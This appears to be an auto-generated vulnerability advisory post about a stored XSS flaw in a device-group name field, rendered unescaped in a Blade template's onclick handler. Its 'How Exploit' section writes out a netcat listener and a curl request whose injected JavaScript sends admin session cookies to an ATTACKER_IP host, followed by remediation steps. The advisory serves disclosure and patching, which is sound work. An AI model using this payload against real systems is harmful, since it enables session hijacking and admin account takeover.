Listen to this Post
How the Mentioned CVE Works
The vulnerability is a stored Cross-Site Scripting (XSS) issue existing in the device group creation functionality. An attacker with admin privileges sends an HTTP POST request to the “/device-groups” URI. The “name” parameter in this request is not sanitized of HTML or JavaScript-related characters. When the device group is saved, its malicious name is stored in the database. Later, when an administrator views the device groups page, the application uses a Blade template (resources/views/device-group/index.blade.php) to render the interface. This template directly embeds the unsanitized device group name into the `onclick` event of the corresponding “Delete” button for that group. Consequently, when any administrator hovers over or clicks the delete button (triggering the `onclick` event), the injected JavaScript payload executes in their browser session, leading to the theft of session cookies and potential account takeover.
dailycve form:
Platform: Device Management System
Version: Not specified
Vulnerability: Stored XSS
Severity: Medium
date: 2026-02-18
Prediction: 2-4 weeks
What Undercode Say:
Analytics:
Authenticated admin POST. Unsanitized name input. Stored in database. Rendered in onclick event. Executes in victim browser. Steals authentication cookies.
How Exploit:
1. Start a listener on attacker machine to receive cookies nc -lvnp 80 2. Use curl to create a malicious device group curl -X POST http://target.com/device-groups \ -H 'Content-Type: application/x-www-form-urlencoded' \ -H 'Cookie: [bash]' \ -d "name=12345');var pt=new Image();pt.src='http://ATTACKER_IP/cookie-'.concat(document.cookie);document.body.appendChild(pt);delete_dg(this, '12345&conditional_input=access_points.accesspoint_id&conditional_value=1" 3. Victim admin views groups and clicks delete 4. Check listener for exfiltrated cookies
Protection from this CVE
1. Input Sanitization (Example in PHP/Laravel)
use IlluminateSupportStr;
$safe_name = htmlspecialchars($request->input('name'), ENT_QUOTES, 'UTF-8');
2. Output Encoding (Blade Template Fix)
Change from:
onclick="delete_dg(this, '{{$device_group->name }}', ...)"
To:
onclick="delete_dg(this, '{{ htmlspecialchars($device_group->name) }}', ...)"
3. Content Security Policy (CSP) Header
header("Content-Security-Policy: script-src 'self'; img-src 'self'");
4. HttpOnly and Secure Cookie Flags
In config/session.php
'http_only' => true,
'secure' => env('SESSION_SECURE_COOKIE', true),
Impact:
Session hijacking. Admin account takeover. Unauthorized device management. Configuration changes. Data breach.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

